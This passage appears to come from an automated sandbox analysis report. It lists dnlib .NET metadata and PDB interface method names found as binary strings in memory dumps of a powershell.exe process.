                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeByName source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethod source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.TranslateSigWithScope source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineUserString source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeSpecFromToken source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Save source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPermissionSetProps source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CountEnum source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodSemantics source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNativeCallConvFromSig source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethods source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFields source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeRefProps source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17K source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetSigFromToken source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeSpecs source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 0000000C.00000002.442998706.0000000002160000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.442834589.00000000002B9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CloseEnum source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleRefProps source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToMemory source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.pdb source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeRefByName source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetScopeProps source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMember source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPropertyProps source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumParams source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.MergeEnd source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetEventProps source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumCustomAttributes source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldProps source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumModuleRefs source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeProps source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldProps source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineParam source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetClassLayout source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteToken source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumPermissionSets source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUnresolvedMethods source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineNestedType source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17 source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetRVA source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleFromScope source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethodImpl source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePinvokeMap source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetClassLayout source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineSecurityAttributeSet source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMemberRef source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPermissionSetProps source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetTypeDefProps source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineProperty source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeDefByName source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetModuleProps source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldRVA source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFieldsWithName source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMemberRefs source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResolveTypeRef source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToStream source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodSemantics source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 0000000C.00000002.442834589.00000000002B9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
